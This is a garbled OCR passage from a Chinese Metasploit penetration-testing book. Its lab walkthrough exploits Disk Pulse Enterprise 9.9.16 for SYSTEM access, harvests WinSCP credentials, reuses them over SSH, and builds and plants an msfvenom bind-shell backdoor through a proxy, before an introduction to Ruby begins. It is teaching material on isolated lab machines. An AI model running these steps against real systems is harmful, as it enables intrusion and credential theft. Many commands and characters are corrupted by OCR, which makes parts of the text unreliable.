KET! 我 们 现在 已 经 看 到 了 那个 应 用 程序 ， 它 就 是 Disk Pulse Enterprise， 而 且 还 是 9.9.16 版 ， 
这 个 版 本 是 存在 漏洞 的 。Metasploit 中 包含 了 很 多 关于 此 漏洞 的 模块 。 我 们 打开 其 中 的 一 个 模块 ， 如 
下 图 所 示 。 
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msf auxiliary(socks4a) > use exploit/windows/http/disk pulse enterprise get 
msf exploit(disk pulse enterprise get) > info 


Name: Disk Pulse Enterprise GET Buffer Overflow 
Module: exploit/windows/http/disk pulse enterprise get 
Platform: Windows 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Disclosed: 2017-08-25 





Provided by: 
Chance Johnson 
Nipun Jaswal & Anurag Srivastava 


lAvailable targets: 
Id Name 


0 Disk Pulse Enterprise 9.9.16 


Basic options: 


Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOST yes The target address 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

VHOST no HTTP server virtual host 


Payload information: 
Avoid: 4 characters 


Description: 
This module exploits an SEH buffer overflow in Disk Pulse Enterprise 
9.9.16. If a malicious user sends a crafted HTTP GET request it is 
possible to execute a payload that would run under the Windows NT 
AUTHORITYASYSTEM account. 


我 正 是 这 个 漏洞 渗透 模块 的 开发 者 之 一 。 在 利用 这 个 漏洞 之 前 ， 我 们 先 来 了 解 一 下 它 。 


1.6.7 ”漏洞 分 析 一 一 基于 SEH 的 缓冲 区 溢出 


这 个 漏洞 是 由 于 Disk Pulse Enterprise 的 Web 服务 屁 组 件 未 能 恰当 地 解析 GET 请 求 造 成 的 。 攻 击 
者 可 以 通过 构造 恶意 的 GET 请 求 来 覆盖 SEH 部 分 , 从 而 实现 对 程序 执行 流程 的 修改 。 由 于 Disk Pulse 
Enterprise 是 以 管理 员 的 权限 在 运行 ， 攻 击 者 将 会 以 此 获得 系统 的 最 高 控制 权限 。 


下 面 利 用 这 个 漏洞 来 渗透 目标 操作 系统 ， 整 个 过 程 如 下 所 示 。 


msf exploit(disk pulse enterprise get) > show options 







































































I 








Module options (exploit/windows/http/disk pulse enterprise get): 





Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][... 
RHOST 192.168.174.130 yes The target address 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

VHOST no HTTP server virtual host 


Payload options (windows/meterpreter/bind tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) 
LPORT 4446 yes The listen port 

RHOST 192.168.174.130 no The target address 


Exploit target: 


Id Name 


0 Disk Pulse Enterprise 9.9.16 


msf exploit(disk pulse enterprise get) > set RHOST 192.168.116.133 
RHOST => 192.168.116.133 
Imsf exploit(disk pulse enterprise get) > exploit 


[*] Started bind handler 

[*] Generating exploit... 

[*] Sending exploit... 

[*] Sending stage (179267 bytes) to 192.168.116.133 

[*] Meterpreter session 5 opened (192.168.174.128-192.168.174.132:0 -» 192.168.116.133:4446) at 2018-01-27 22:25:57 40530 
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在 使 用 这 个 模块 的 过 程 中 ,我们 仅仅 设置 了 RHOST 和 LPORT ( 用 来 控制 被 成 功 渗透 主机 的 端口 ) 


两 个 参数 ， 就 完成 了 渗透 的 准备 工作 。 可 以 看 到 当 执行 exploit 命令 的 时 候 ， 第 五 个 会 话 就 打开 

















T. 


这 表示 我 们 已 经 成 功 地 渗透 了 目标 计算 机 。 接 下 来 使 用 sessions -i 命令 来 查看 一 下 当前 的 会 话 列表 。 





msf > 


sessions -i 


Active sessions 


Id 


Type 


meterpreter php/linux www-data (33) @ ubuntu 

.168.174.128:4444 -» 192.168.174.132:44567 (192.168.174.132) 

meterpreter x64/linux uid-33, gid-33, euid-33, egid-33 @ 192.168.174.132 
.168.174.128:4443 -» 192.168.174.132:38899 (192.168.174.132) 

meterpreter x64/linux uid-0, gid-0, euid-0, egid-0 @ 192.168.174.132 
.168.174.128:4443 -» 192.168.174.132:38900 (192.168.174.132) 

meterpreter x86/windows NT AUTHORITYNSYSTEM @ WIN-G2FTBHAP178 
.168.174.128-192.168.174.132:0 -» 192.168.116.133:4446 (192.168.116.133) 


Information 








切换 到 会 话 5， 然 后 查看 在 这 


输入 getuia 命令 ， 可 以 看 到 我 们 已 经 拥有 了 “NT AUTHORITY SYSTEM” 级 别 的 权限 ， 





是 Windows 操作 系统 


关于 这 个 














最 高 级 别 
漏洞 的 更 多 


CVE-2017-13696, 


会 话 中 我 们 所 拥有 的 系统 权限 。 








meterpreter > getuid 

Server username: NT AUTHORITYNSYSTEM 
meterpreter > getpid 

Current pid: 3772 

meterpreter > background 

[*] Backgrounding session 5... 











的 权限 。 


信息 ， 可 以 查看 http://cve.mitre.org/cgi-bin/cvename.cgi?name= 


1.6.8 fJ A Zl 22K AR (So 





现在 已 经 获得 了 目标 系统 最 高 的 控制 权限 ， 接 下 来 尝试 一 些 后 渗透 测试 模块 ， 如 下 所 示 。 





SESSION 5 


VMware Tools 
WinSCP 5.7 





msf > use post/windows/gather/enum applications 
msf post(enum applications) > show options 


Module options (post/windows/gather/enum applications): 


Name Current Setting Required Description 


yes The session to run this module on. 
msf post(enum applications) > run 
[*] Enumerating applications installed on WIN-G2FTBHAP178 


Installed Applications 


Disk Pulse Enterprise 9.9.16 
FileZilla Client 3.17.0 
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9. 0.30729.4148 


Results stored in: /root/.msf4/loot/20180127230357 AcmeTest 192.168.116.133 host.application 482900.txt 
[*] Post module execution completed 
msf post(enum applications) > 


Version 


10.0.6.3595377 
5.7 








这 就 
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搜索 一 下 目标 系统 上 都 安装 了 哪些 应 用 程序 是 一 个 不 错 的 主意 ， 因 为 在 这 些 程序 中 可 能 保存 了 
登录 到 网 络 其 他 部 分 的 赁 证。 根据 给 出 的 应 用 程序 我 们 发 现 了 WinSCP 5.7， 这 是 一 个 非常 流 
行 的 SSH 和 SFTP 客户 端 ， 而 使 用 Metasploit 则 可 以 获取 保存 在 它 里 面 的 登录 凭证 。 现 在 运行 一 下 
然后 查看 是 否 获 得 了 保存 在 WinSCP 里 面 的 















































post/windows/gather/credentials/winscp 模块 ， 


登录 凭证 





msf post(winscp) > show options 
Module options (post/windows/gather/credentials/winscp): 


Current Setting Required Description 


Name 


SESSION 5 yes 


The session to run this module on. 
msf post(winscp) > run 


[*] Looking for WinSCP.ini file storage... 
[*] Looking for Registry storage... 
Host: 192.168.116.134, IP: 192.168.116.134, Port: 22, Service: Unknown 
, Username: root, Password: SecurePasswOrd 
[*] Post module execution completed 
msf post(winscp) > M 











KIET, 我 们 找到 了 一 个 用 来 登录 到 网 络 中 另 一 台 主 机 192.168.116.134 的 登录 赁 证。 更 邻 人 兴奋 
的 是 这 个 登录 凭证 是 一 个 root 用户, 所 以 当 我 们 使 用 这 个 账户 访问 目标 系统 时 ， 将 会 直接 获得 最 高 控 
EWE, WI TZ. 


制 权 限 。 我 们 在 ssh. 1ogin 模块 中 使 用 这 个 登录 凭 





















































如 下 图 所 示 。 


msf post(winscp) > use auxiliary/scanner/ssh/ssh login 
msf auxiliary(ssh login) » show options 
Module options (auxiliary/scanner/ssh/ssh login): 

Name Current Setting Required Description 

BLANK PASSWORDS false no Try blank passwords for all users 

BRUTEFORCE SPEED 5 yes How fast to bruteforce, from 0 to 5 

DB ALL CREDS false no Try each user/password couple stored in 

the current database 

DB ALL PASS false no Add all passwords in the current databa 
se to the list 

DB ALL USERS false no Add all users in the current database t 
o the list 

PASSWORD no A specific password to authenticate wit 
h 

PASS FILE no File containing passwords, one per line 

RHOSTS 192.168.116.128 yes The target address range or CIDR identi 
fier 

RPORT 22 yes The target port 

STOP ON SUCCESS false yes Stop guessing when a credential works f 
or a host 

THREADS 1 yes The number of concurrent threads 

USERNAME no A specific username to authenticate as 

USERPASS FILE no File containing users and passwords sep 
arated by space, one pair per line 

USER AS PASS false no Try the username as the password for al 
l users 

USER FILE no File containing usernames, one per line 

VERBOSE false yes Whether to print output for all attempt 
s 

我 们 已 经 知道 了 用 户 名 和 密码 ,下面 就 可 以 对 这 个 模块 中 的 对 应 选项 赋值 ,然后 输入 目标 下 地 址 ， 
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msf auxiliary(ssh login) > set USERNAME root 
USERNAME -» root 
msf auxiliary(ssh login) > set PASSWORD SecurePasswOrd 
PASSWORD => SecurePasswOrd 

msf auxiliary(ssh login) > set RHOSTS 192.168.116.134 


RHOSTS -» 192.168.116.134 


msf auxiliary(ssh login) > run 


192.168.116.134:22 - Success: 'root:SecurePasswOrd' 'uid-0(root) gid-O0(root) groups 
-0(root) Linux ubuntu 4.10.0-28-generic £32-16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 


2017 x86 64 x86 64 x86 64 GNU/Linux ' 


[*] Command shell session 6 opened (192.168.174.128-192.168.174.132:0 -» 192.168.116.13 


4:22) at 2018-01-27 23:11:29 40530 

[*] Scanned 1 of 1 hosts (100* complete) 
[*] Auxiliary module execution completed 
msf auxiliary(ssh login) > J 











EIRT, RRI! Metasploit 已 经 成 功 地 自动 获取 到 目标 系统 




















的 Meterpreter 控制 权限 ， 可 以 使 用 msfvenom 命令 来 创建 一 个 后 门 程序 。 


的 控制 ， 














不 过 如 果 希 望 得 到 更 高 








root@kali:~# msfvenom -p linux/x64/meterpreter/bind tcp LPORT-1337 -f elf > bind 


.elf 


No platform was selected, choosing Msf::Module::Platform::Linux from the payload 
No Arch selected, selecting Arch: x64 from the payload 
No encoder or badchars specified, outputting raw payload 


Payload size: 78 bytes 


Final size of elf file: 198 bytes 





这 个 后 门 程序 在 执行 后 将 会 连接 到 主机 的 1337 端 








口 ， 不 过 如 何 才能 将 这 个 程序 送 到 这 个 已 经 被 

















渗透 的 主机 上 呢 ? 别 忘 了 ,之 前 我 们 已 经 运行 了 socks 代理 辅助 模块 并 且 修改 了 配置 。 如 果 在 一 个 命 
令 行 程序 执行 时 给 它 加 上 proxychains 前 级 的 话 ， 这 个 程序 就 会 将 proxychains 作为 代理 。 所 以 
当 要 传输 一 个 文件 的 时 候 ， 我 们 就 可 以 按照 如 下 图 所 示 的 方法 使 用 scp。 


























bind.elf 
rootékali:-£ 





100% 198 4.2KB/s 00:00 


rootGkali:-£ proxychains scp bind.elf root8192.168.116.134:/home/nipun/flock.e 
ProxyChains-3.1 (http://proxychains.sf.net) 
|S-chain|-«»-127.0.0.1:1080-«»2«»-192.168.116.134:22-«»«»-0K 
rootQ0192.168.116.134's password: 

Permission denied, please try again. 

root80192.168.116.134's password: 








好 了 ,这 个 文件 已 经 成 功 传送 过 去 了 。 像 之 前 一 样 ， 运行 对 应 的 handler， 就 可 以 看 到 目标 系统 的 
连接 。 下 面 查看 一 下 在 本 次 练习 中 获得 的 全 部 目标 和 会 话 ， 如 下 图 所 示 。 





msf auxiliary(ssh login) > sessions -i 


Active sessions 


Id Type 

1 meterpreter 
44 -» 192.168.174. 

2 meterpreter 
43 -» 192.168.174. 

3 meterpreter 
43 -» 192.168.174. 

5 meterpreter 


2.168.174.132:0 -» 192.168.116. 


11 meterpreter 


2.168.174.132:0 -» 192.168.116. 


12 shell /linux 


2.168.174.132:0 -» 192.168.116. 


msf auxiliary(ssh ' 


php/linux 


Information 


www-data (33) @ ubuntu 


132:44567 (192.168.174.132) 


x64/linux 


uid-33, gid-33, euid-33, egid-33 @ 192.168.174.132 


132:38899 (192.168.174.132) 


x64/linux 


uid-0, gid-0, euid-0, egid-0 @ 192.168.174.132 


132:38900 (192.168.174.132) 


x86/windows 


x64/linux 


login) > B 


NT AUTHORITYNSYSTEM @ WIN-G2FTBHAP178 

133:4446 (192.168.116.133) 

uid-0, gid-0, euid-0, egid-0 @ 192.168.116.134 
134:1337 (192.168.116.134) 

SSH root:SecurePasswOrd (192.168.116.134:22) 
134:22 (192.168.116.134) 


Connection 


192.168.174. 


192.168.174. 


192.168.174. 


192.168.174. 


192.168.174. 


192.168.174. 


128:44 


128:44 


128:44 


128-19 


128-19 


128-19 
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在 这 个 实际 的 例子 中 ,我 们 渗透 了 三 个 系统 ， 并 分 别 通过 本 地 漏洞 、 人 为 玻 忽 以 及 软件 漏洞 获得 
了 它们 的 最 高 控制 权限 。 


1.7 案例 研究 回顾 


为 了 建立 测试 环境 ,我 们 需要 建立 两 个 不 同 的 网 络 ， 以 及 多 个 操作 系统 。 所 需 组 件 的 详细 信息 如 
下 表 所 示 。 






































组 件 名 称 类 型 版 本 网 络 信息 网 络 类 型 
Kali Linux VM Image ”操作 系统 Kali Rolling (2017.3) x64 192.168.174.128 (Vmnet8) Host-only 
Ubuntu 14.04 LTS 操作 系统 14.04 (trusty) 192.168.174.132 (Vmnet8) Host-only 

192.168.116.129 (Vmnet6) Host-only 
Windows 7 操作 系统 Pro 192.168.116.133 (Vmnet6) Host-only 
Ubuntu 16.04 LTS 操作 系统 16.04.3 LTS (xenial) 192.168.116.133 (Vmnet6) Host-only 
PhpCollab 应 用 程序 2.5.1 
Disk Pulse 企业 磁盘 管理 软件 9.9.16 
WinSCP SSH 和 SFTP 软件 Sy 
过 程 回 顾 


在 整个 练习 过 程 中 ,我们 经 历 了 以 下 关键 步骤 。 

(1) 使 用 Nmap 对 目标 IP 地址 192.168.174.132 进行 扫描 。 

(2) Nmap 扫描 显示 ，192.168.174.132 上 的 80 端口 是 开放 的 。 

(3) 对 目标 80 端口 上 运行 的 应 用 程序 进行 踩点 ， 结 果 为 Apache 2.4.7。 

(4) 使 用 浏览 器 查看 HTTP 端口 的 内 容 ， 但 没有 任何 发 现 。 

(5) 运行 dir scanner 模块 对 Apache 服务 器 进行 字典 式 扫描 ,找到 了 PhpCollab 应 用 程序 的 目录 。 

(6) 使 用 searchsploit 找到 了 一 个 针对 PhpCollab 的 漏洞 渗透 模块 ， 不 过 这 个 模块 必须 导入 到 
Metasploit 中 才能 使 用 。 

(7) 成 功 渗透 这 个 应 用 程序 ， 也 因此 获得 了 目标 系统 的 控制 权限 〈 受 限 的 )。 

(8) 为 了 提升 控制 权限 ， 上 传 了 一 个 可 执行 的 后 门 程序 。 

(9) 运行 suggester 模块 ,并 发 现 overlayfs 权限 提升 漏洞 可 以 帮助 我 们 获得 对 目标 系统 的 root 
控制 权限 。 

(10) 从 https://exploit-db.com/ 下 载 针 对 这 个 漏洞 的 渗透 模块 , 对 其 进行 编译 后 运行 , 以 此 来 获得 目 
标 系统 上 的 root 级 控制 权限 。 

(11) 使 用 先前 生成 的 那个 后 门 程序 ， 获 得 了 另 一 个 Meterpreter 的 控制 权限 ， 不 过 这 次 取得 的 权限 
是 root 级 别 的 。 
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10. 获取 root 权 限 
Ba, iiis ocio od tg 
8. x64/linux Meterpreter 可 执行 文件 


7. PHPCollab 渗 透 模块 
ee et i 
5. 目录 扫描 模块 

3. Service 验 证 


1. Nmap/TCP 扫 描 


| 


80 

2. 端口 80 是 开放 的 

3. Apache 2.4.7 
q 80 

7. shell 控 制 权限 (www-data) "m 
«————————— Á—— 

8. x64/Linux shell (www-data) 

4443 


: 11. x64/Linux shell (root) 


80 





192.168.174.128 





192.168.174.132 








(12) 





使 用 Metasploit 中 的 sshkey. persistence 模块 来 实现 对 目标 系统 的 持久 控 





c 


(13) 在 目标 系统 上 运行 arp 命令 ,发 现 该 系统 还 连接 到 了 另外 一 个 网 路 ,也 就 是 192.168.116.0/24。 


(14) 使 用 autoroute 脚本 添加 一 个 到 达 这 个 网 络 
(15) 使 用 Metasploit 中 的 TCP 端口 扫描 器 来 扫描 妆 
(16) 发 现 目标 系统 的 80 端口 是 开放 的 。 
(17) 之 前 只 能 通过 Meterpreter 访问 






























































目标 网 络 , 现在 可 以 使 


的 路 由 。 
所 发 现 的 网 络 。 





TE 





FH Metasploit 中 的 socks4a 模块 , 这 档 


其 他 工具 就 可 以 通过 这 个 模块 连接 到 目标 网 络 。 
(18) 运行 socks 代理 ， 将 浏览 器 所 使 用 代理 的 端口 设置 为 1080。 























(19) 在 浏览 器 中 打开 192.168.116.133， 发 现 目 标 系统 








中 运行 着 Disk Pulse 9.9.16 服务 器 。 


(20) 在 Metasploit 中 查找 关于 Disk Pulse 的 信息 ， 发 现 这 个 软件 存在 一 个 基于 SEH 的 缓冲 区 溢出 





漏洞。 
(21) 因为 这 个 软件 是 以 系统 级 权限 运行 的 ， 所 以 在 成 功 渗透 这 个 软件 之 后 就 可 以 者 
最 高 控制 权限 。 








闫 得 目标 系统 的 





21 渗透 Disk Pulse 9.9.16 


15. 对 192.168.116. 133 进 行 TCP 扫 措 
q — — — 


12. 添 加 一 个 SSH 密 钥 持 


入 化 控制 


4443 
13. 使 用 Arp 和 ifconfig 命 令 





192.168.174.128 





192.168.174.132 









192.168.116.133 
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(22) 查看 目标 系统 上 所 安装 的 软件 列表 ， 并 在 其 中 找到 了 WinSCP 5.7. 
(23) 发 现 Metasploit 中 内 置 了 一 个 可 以 从 WinSCP 收集 登录 凭证 的 模块 。 
(24) 在 WinSCP 中 找到 了 一 个 root 登录 凭证 ， 并 在 ssh. 1ogin 模块 中 用 这 个 凭证 登录 到 目标 系统 。 

















































192.168.116.133 


25. 获得 192.168.116.134 的 root 级 
控制 权限 右 侧 


192.168.174.1 192.168.174.132 











192.168.116.134 











Q5) 上 传 男 一 个 后 门 程序 ， 获 得 了 目标 系统 上 的 root 控制 权限 。 


1.8 小 结 与 练习 


本 章 介 绍 了 渗透 测试 的 各 个 阶段 ， 讲 解 了 Metasploit 的 安装 过 程 以 及 如 何 对 指定 网 络 开展 黑 盒 测 
试 ， 回 顾 了 Metasploit 的 基本 功能 和 用 法 ,还 阐释 了 在 Metasploit 中 使 用 数据 库 的 优势 ， 以 及 如 何 使 
用 Metasploit 实现 跳板 攻击 。 
学 完 本 章 ， 我 们 掌握 了 以 下 内 容 。 
a 关于 渗透 测试 各 阶段 的 理论 
口 在 Metasploit 中 使 用 数据 库 的 好 处 
口 Metasploit 测试 框架 的 基础 知识 
口 渗透 模块 和 辅助 模块 的 工作 原理 
口 如 何 通 过 跳板 实现 对 内 部 网 络 的 攻击 以 及 路 由 的 设置 方法 
口 了 解 利 用 Metasploit 进行 渗透 测试 的 方法 
本 章 的 主要 目的 是 介绍 渗透 测试 的 各 个 阶段 和 Metasploit 框架 ， 为 后 续 章 节 的 学 习 做 准备 。 
你 可 以 通过 完成 下 面 的 练习 来 加 深 对 本 章 内 容 的 理解 。 
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口 参照 渗透 测试 执行 标准 ， 深 入 了 解 渗透 测试 的 所 有 阶段 。 
口 在 Metasploit 框架 中 使 用 overlayfs 权限 提升 模块 。 
Q 找到 至 少 三 个 Metasploit 中 所 没有 的 漏洞 渗透 模块 ， 并 将 它们 加 载 到 Metasploit 中 。 
O 在 Windows 7 系统 上 使 用 后 渗透 模块 ， 并 找 出 最 优秀 的 五 个 后 渗透 测试 模块 。 
口 选择 最 合适 的 一 种 方法 来 建立 对 Windows 7 的 持久 性 控制 ， 并 检查 在 这 个 方法 的 实施 过 程 中 
是 否 会 触发 反 病 毒 软件 。 
口 在 不 同 的 操作 系统 ( Windows、Linux fll Mac) 上 至 少 测试 三 种 持久 性 控制 方法 。 
下 一 章 , 我 们 将 会 开始 程序 编写 以 及 Metasploit 模块 的 构建 工作 。 我 们 会 学 习 如 何 使 用 Metasploit 
来 构建 先进 的 模块 ， 了 解 一 些 最 流行 的 扫描 和 验证 测试 脚本 的 工作 原理 。 
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打造 定制 化 的 Metasploit 
渗透 测试 框架 








回顾 完 Metasploit 基本 功能 的 用 法 之 后 ， 下 所 
语言 的 基础 知识 ， 然 后 是 Ruby 的 各 种 语法 和 语义 。 通 









































i 开始 学 习 Metasploit 模块 的 编写 。 首 先是 Ruby 编程 
过 这 一 章 的 学 习 ， 你 将 轻松 掌握 Metasploit 模块 











的 编写 要 领 。 本 章 将 会 讲解 如 何 设计 和 制作 各 种 自 定 义 Metasploit 模块 , 以 及 如 何 创建 自 定义 的 后 渗透 


模块 ， 这 将 有 助 于 我 们 更 好 地 控制 

设想 这 样 一 种 情况 : 我 们 要 开 
行 后 渗透 测试 工作 , 例如 从 所 有 的 
定 文 件 将 会 花费 大 量 的 时 间 和 精力 
个 脚本 会 自动 从 所 有 被 渗透 了 的 目 








已 成 功 渗透 的 目标 主机 系统 。 
展 渗 透 测试 的 目标 系统 数量 非常 多 ,并 























且 还 需要 在 成 功 渗透 之 后 进 
目标 主机 系统 上 下 载 一 个 指定 的 文件 。 从 每 个 目标 系统 手动 下 载 指 





。 因 此 , 在 这 种 情形 下 可 以 编写 一 个 自 定 义 的 后 渗透 模块 脚本 ， 这 


标 系统 中 下 载 指定 文件 。 


本 章 首 先 介 绍 在 Metasploit 环境 中 Ruby 编程 的 相关 知识 ， 然 后 讲解 如 何 开 发 各 种 Metasploit 模块 。 


本 章 着 眼 于 以 下 几 个 要 点 。 


口 研究 Metasploit 的 模块 。 


口 编写 Meterpreter 脚本 。 





























O 了 解 在 Metasploit 环境 中 Ruby 编程 的 基础 知识 。 


Q 编写 自 定义 的 扫描 模块 、 暴 力 破 解 模 块 和 后 渗透 模块 。 


口 理解 Metasploit 模块 的 语法 和 语义 。 
口 通过 RailGun 使 用 DLL 完成 十 分 困难 的 任务 。 


























现在 让 我 们 开始 了 解 Ruby 编程 语言 的 基础 ， 并 积累 与 Metasploit 模块 编写 相关 的 知识 。 


在 深入 研究 Metasploit 模 块 的 编写 之 前 ,必须 了 解 编写 这 些 模块 所 必需 的 Ruby 编 程 语言 的 核心 特性 。 
为 什么 学 习 Metasploit 时 要 掌握 的 语言 是 Ruby 呢 ? 下 面 几 点 将 帮助 我 们 揭示 这 个 问题 的 答案 。 























口 Ruby 是 一 种 面向 对 象 的 编程 语言 。 
O Ruby 是 一 种 解释 型 语言 ， 执 行 速度 快 ， 项 目 开 发 周期 短 。 








口 可 以 构建 自动 化 类 来 重用 代码 是 Ruby 语言 的 一 个 特点 ， 而 这 个 特点 正好 满足 了 Metasploit 的 
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2.1 Ruby 一 一 Metasploit 的 核心 


Ruby 编程 语言 可 以 说 是 Metasploit 框架 的 核心 .不 过 Ruby 到 底 是 什么 呢 ? 根 据 Ruby 官方 网 站 的 
说 法 ，Ruby 是 一 种 简单 而 强大 的 编程 语言 。 日 本 的 松本 行 弘 在 1995 年 设计 并 实现 了 Ruby 语言 。 后 
来 它 被 进一步 定义 为 功能 类 似 于 Perl 语言 的 、 具 有 动态 特性 和 反射 机 制 的 、 通 用 的 面向 对 象 ( object- 
oriented programming，OOP ) 的 程序 设计 语言 。 





























可 以 从 http://Rubyinstaller.org/downloads/ 下 载 Windows/Linux 版 本 的 Rubys 
也 可 以 通过 下 面 的 网 页 获得 优秀 的 Ruby 学 习 资 源 :http://tryruby.org/levels/1/challenges/。 


2.1.1 创建 你 的 第 一 个 Ruby 程序 

Ruby 是 一 种 十 分 简单 易学 的 编程 语言 。 首先 了 解 一 下 Ruby 语言 的 基础 知识 。 请 记 住 , Ruby 是 一 
种 内 容 十 分 丰富 的 编程 语言 。 如 果 讲 解 Ruby 的 所 有 知识 将 会 远 远 超出 本 书 的 范围 ， 因 此 我 们 将 只 涉 
及 编写 Metasploit 模块 所 必需 的 Ruby 知识 。 

1. Ruby 的 交互 式 命令 行 

Ruby 语言 提供 了 一 个 可 以 进行 交互 的 命令 行 。 在 交互 式 命令 行 上 进行 工作 可 以 使 我 们 更 清楚 地 
理解 Ruby 的 基础 知识 。 好 的 , 现在 就 要 开始 了 。 首先 打开 你 的 CMD 命令 行 或 者 终端 窗口 ,然后 在 其 
中 输入 命令 irp 来 启动 Ruby 的 交互 式 命令 行 。 

先 在 Ruby 交互 式 命令 行 中 输入 一 些 内 容 ， 然 后 查看 发 生 的 变化 。 假 设 如 下 所 示 输 入 数字 2: 



























































usd 
























































irb(main):001:0» 2 
2» 2 


交互 式 命令 行 返 回 并 输出 了 刚刚 输入 的 值 。 现 在 ,来 进行 男 一 个 操作 ,例如 一 个 如 下 所 示 的 加 法 








irb(main):002:0» 2+3 
a> b 


可 以 看 到 ， 如 果 输 入 的 内 容 是 一 个 表达 式 的 话 ， 交 互 式 命令 行 会 返回 并 输出 表达 式 的 结果 。 
现在 来 执行 一 些 对 字符 串 的 操作 , 例如 将 一 个 字符 串 类 型 的 值 保存 到 一 个 变量 中 。 过 程 如 下 所 示 : 


irb(main):005:0» a= "nipun" 

=> "nipun" 

irb(main):006:0> b= "loves Metasploit" 
=> "loves metasploit" 


当 对 变量 a 和 b 赋值 结束 后 ， 我 们 来 查看 一 下 当 在 交互 式 命令 行 中 输入 a 和 atb 时 ， 交 互 式 命 
令 行 是 如 何 反应 的 : 


irb(main):014:0» a 

=> "nipun" 

irb(main):015:0> a+b 

=> "nipun loves metasploit" 
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可 以 看 到 ， 当 将 a 作为 一 个 输入 时 ,交互 式 命令 行 返回 并 输出 了 它 保存 的 名 为 a 的 变量 的 值 。 类 
似 地 ， 输 入 a+b 返回 并 输出 的 结果 为 变量 a 和 ob 的 连接 。 

2. 在 命令 行 中 定义 方法 

方法 或 者 函数 是 一 组 语句 ， 当 我 们 调用 它们 时 会 开始 执行 。 可 以 简单 地 在 Ruby 交互 命令 行 中 声 
明 一 个 方法 ,也 可 以 在 脚本 中 对 它们 进行 声明 。 在 使 用 Metasploit 模块 时 ，Ruby 的 方法 是 一 个 很 重要 
的 部 分 。 来 看 看 它 的 语法 格式 : 


def method name [( [arg [= default]]...[, * arg [, &expr ]])] 
expr 
end 


要 定义 一 个 方法 ,首先 以 aet 开始 ， 紧 随 其 后 的 是 方法 的 名 称 ， 然 后 是 包含 在 括号 中 的 参数 和 
表达 式 。 我 们 还 将 一 个 ena 声明 放 在 所 有 表达 式 的 最 后 来 结束 对 方法 的 定义 。 这 里 ，arg 指 的 是 方 
法 所 接收 的 参数 ，expr 指 的 是 方法 接收 并 计算 的 表达 式 。 来 看 一 个 例子 : 






























































):002:0» def xorops (a,b) 
main):003:1» res = a ^ b 
):004:1» return res 
irb(main):005:1» end 
=> :XOorops 


我 们 定义 了 一 个 名 为 xorops 的 方法 ， 它 接收 a 和 了 两 个 参数 。 接 着 对 接收 到 的 参数 进行 异 或 
运算 ， 并 将 结果 保存 到 一 个 名 为 res 的 新 变量 中 。 最 后 使 用 return 语句 来 返回 结果 。 


irb(main):006:0» xorops (90,147) 
-» 201 


可 以 看 到 ,函数 通过 异 或 运算 打印 出 了 正确 的 结果 。Ruby 语言 提供 了 puts fll print 这 两 种 输出 
打印 函数 。 当 涉及 Metasploit 框架 时 ， 将 使 用 print_line 函数 。 我 们 可 以 分 别 使 用 print good, 
print status 和 print_error 语句 来 表示 成 功 执 行 、 状 态 和 错误 。 下 面 给 出 了 具体 的 示例 : 


print good("Example of Print Good") 
print status("Example of Print Status") 
print error("Example of Print Error") 


当 你 在 Metasploit 模块 下 运行 这 些 命令 时 会 产生 如 下 输出 ，+ 符 号 并 绿色 显示 表示 正常 ，* 符 号 并 
蓝 色 显示 表示 状态 信息 ，- 符 号 并 红色 显示 表示 错误 信息 。 


+] Example of Print Good 
*] Example of Print Status 
-] Example of Print Error 


我 们 将 会 在 本 章 的 后 半 部 分 学 习 各 种 类 型 的 输出 语句 的 作用 。 








































































































2.1.2. Ruby 中 的 变量 和 数据 类 型 


变量 是 指 一 个 值 随时 可 以 改变 的 占 位 符 。 在 Ruby 中 ,我 们 只 有 在 需要 使 用 一 个 变量 的 时 候 才 对 
其 进行 声明 。Ruby 语言 支持 数目 众多 的 变量 数据 类 型 , 但 是 我 们 只 讨论 与 Metasploit 相关 的 数据 类 型 。 






































48 第 2 章 打造 定制 化 的 Metasploit 渗透 测试 框架 





下 面 来 看 看 这 些 数据 类 型 以 及 它们 的 操作 。 
1. 字符 串 的 处 理 








符 串 类 型 的 值 赋 给 一 个 变量 。 通 过 简单 地 使 用 双 引 号 或 者 单 引 号 标记 一 个 值 ， 就 可 以 将 这 个 值 定义 为 

















这 里 推荐 尽量 使 用 双 引 号 标记 ， 因 为 单 引号 标记 可 能 会 引发 问题 。 看 一 下 可 能 引发 的 问题 : 











irb(main):005:0» name = 'Msf Book' 
=> "Msf Book" 
irb(main):006:0» name - 'Msf's Book' 


irb(main):007:0' ' 

可 以 看 到 ， 当 使 用 一 对 单 引 号 标记 时 ， 它 们 工作 了 。 然 而 当 试 图 使 用 Msf's 代替 Msf 时 ， 却 出 
现 了 错误 。 这 是 因为 在 程序 执行 时 ， 系 统 误 将 Msf's 中 的 单 引 号 当成 了 字符 串 结束 的 单 引 号 ， 这 显 
然 并 非 我 们 所 愿 。 而 这 种 情况 导致 程序 出 现 了 语法 错误 。 

e 字符 串 连接 

在 使 用 Metasploit 模块 的 时 候 ， 会 用 到 字符 串 连接 功能 。 我 们 有 好 几 个 实例 都 需要 将 两 个 不 同 的 
结果 连接 成 一 个 字符 串 。 可 以 使 用 + 运算 符 来 实现 字符 串 链接 。 另 外 ， 当 需要 在 一 个 变量 后 面 追加 数 
据 的 时 候 ， 也 可 以 使 用 << 运 算 符 : 



















































































irb(main):007:0» a = "Nipun" 
=> "Nipun" 
irb(main):008:0» a «« " loves" 


-» "Nipun loves" 

irb(main):009:0» a << " Metasploit" 

-» "Nipun loves Metasploit" 

irb(main):010:0» a 

-» "Nipun loves Metasploit" 

irb(main):011:0» b = " and plays counter strike" 

=> " and plays counter strike" 

irb(main):012:0» a+b 

-» "Nipun loves Metasploit and plays counter strike" 


这 里 先 将 "Nipun" 赋 值 给 变量 a， 然 后 再 使 用 << 运 算 符 在 它 的 后 面 妃 加 了 "loves" 和 "Metasploit"。 
更 用 另 一 个 变量 b 保存 了 值 "and plays counter strike"。 接 下 来 ,简单 地 使 用 + 运算 符 将 这 两 个 


